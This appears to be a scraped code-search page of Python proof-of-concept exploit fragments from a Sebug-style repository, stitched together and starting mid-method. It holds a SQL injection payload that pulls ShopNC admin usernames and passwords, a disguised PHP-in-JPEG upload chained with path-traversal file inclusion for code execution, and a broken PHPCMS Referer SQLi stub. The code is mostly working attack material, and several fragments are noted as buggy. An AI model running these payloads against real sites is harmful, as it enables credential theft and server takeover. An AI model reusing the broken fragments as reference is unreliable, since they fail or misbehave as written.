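        payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a"
        post_data = "".join([
            "form_submit=ok&id=&true_name[]=",
            payload,
            "&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123",
        ])

        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        req.post(vul_url, data=post_data, headers=headers)
        res = req.get(url)
        if res.status_code == 200:
            # r'~\w*' also matches a bare '~', so a stray tilde elsewhere on the
            # page can shift the pair.  The original indexed [0] and [1]
            # unconditionally and raised IndexError on fewer than two matches.
            match_result = re.findall(r'~\w*', res.content, re.I | re.M)
            if len(match_result) >= 2:
                result['AdminInfo'] = {}
                result['AdminInfo']['Username'] = match_result[0][1:]
                result['AdminInfo']['Password'] = match_result[1][1:]
        return self.parse_attack(result)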
文件: poc.py 项目: flyr4nk/Sebug
    def _verify(self):
        """Upload a probe "image" and include it through the `d` LFI parameter (only when self.check_argv() passes).

        The multipart body uploads testjpg.jpg containing
        `<?php echo md5(0x2333333);unlink(__FILE__); ?>`; the reply is parsed
        for the stored file name, which is then included via
        index.php?d=../../uploadfiles/<name>%00.  Seeing
        5a8adb32edd60e0cfb459cfb38093755 (md5(0x2333333)) confirms execution,
        and the probe unlinks itself on that first include -- if the include
        never happens, the uploaded PHP file stays on the server.
        Returns None when check_argv() fails, as the original did.
        """
        if not self.check_argv():
            return None
        outcome = {}
        # Mutates the instance-wide header dict (as the original did).  The
        # upload below does not pass headers explicitly, so whether this
        # Content-Type is actually sent depends on how `req` is wired up.
        self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz"
        post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php echo md5(0x2333333);unlink(__FILE__); ?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n  \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n"
        upload_url = urlparse.urljoin(self.url, 'index.php?ac=common_upfile&type=')
        upload = req.post(url=upload_url, data=post_data)

        if upload.status_code != 200:
            return self.parse_attack(outcome)
        stored = re.search(r'value =\'(.*?)\'', upload.content, re.I | re.M)
        if stored is None:
            return self.parse_attack(outcome)
        # Traverse out of the include root into uploadfiles/ and null-terminate
        # to drop any suffix the application appends.
        traversal = "../../uploadfiles/" + stored.group(1) + "%00"
        include_url = urlparse.urljoin(self.url, "index.php?d=" + traversal)
        included = req.get(include_url)
        if included.status_code == 200 and '5a8adb32edd60e0cfb459cfb38093755' in included.content:
            outcome['VerifyInfo'] = {'URL': include_url}
        return self.parse_attack(outcome)
 def _attack(self):
     """Attack mode: re-fetch self.url with Referer=self.url and hand the raw response to parse_attack.

     NOTE(review): every other PoC on this page passes a result dict to
     parse_attack; passing the Response object looks like a mistake, but the
     base class is not visible here -- confirm before changing.
     """
     response = req.get(self.url, headers={"referer": self.url}, timeout=10)
     return self.parse_attack(response)
 def _verity(self):
     """Unfinished stub of a PHPCMS data/js.php Referer-header SQLi check.

     NOTE(review): the method is named `_verity`, not `_verify`, so the
     framework never invokes it; `head` is never defined (the complete
     version of this check elsewhere on this page builds
     `{'Referer': payload}`); `payload` is built but never sent; and nothing
     is returned.
     """
     result = {}
     vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
     payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
     # `head` is not assigned anywhere in this method -- NameError at runtime.
     resp = req.get(vulurl, headers=head)
     pass